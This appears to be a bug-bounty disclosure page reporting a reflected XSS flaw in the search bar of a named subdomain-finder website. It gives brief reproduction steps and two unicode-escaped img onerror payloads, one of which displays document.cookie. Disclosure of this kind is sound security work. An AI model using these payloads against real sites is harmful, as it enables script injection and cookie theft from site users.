Chat with BLT Bot

We reply immediately

Loading...

Reflected XSS. Steps :First open the website in any browser like chrome or Firefox.Navigate to the search bar where we search subdomain and inject the payload.Payload I:\u002D\u0022\u003Cimg src\u003Dx onerror\u003Dalert(\u0022xss\u0022)\u003E\u0022.In similar way users cookies can also be stolen using this payload Payload II:\u002D\u0022\u003Cimg src\u003Dx onerror\u003Dalert(document.cookie)\u003E\u0022

http://www.subdomainfinder.c99.nl


Tweet   GitHub Link  

Screenshots

Comments (0)

To comment, please sign in.

Event ID: 1146

User Profile Logo
Total Points = 264
crypto address qr code
Browser Image
Browser Version: 84.0.4147
Operating System Linux
Added On
Aug. 29, 2020, 3:04 a.m.
Bug Type
Functional
Submitted
Independently
OS Version:
Unknown
v1.5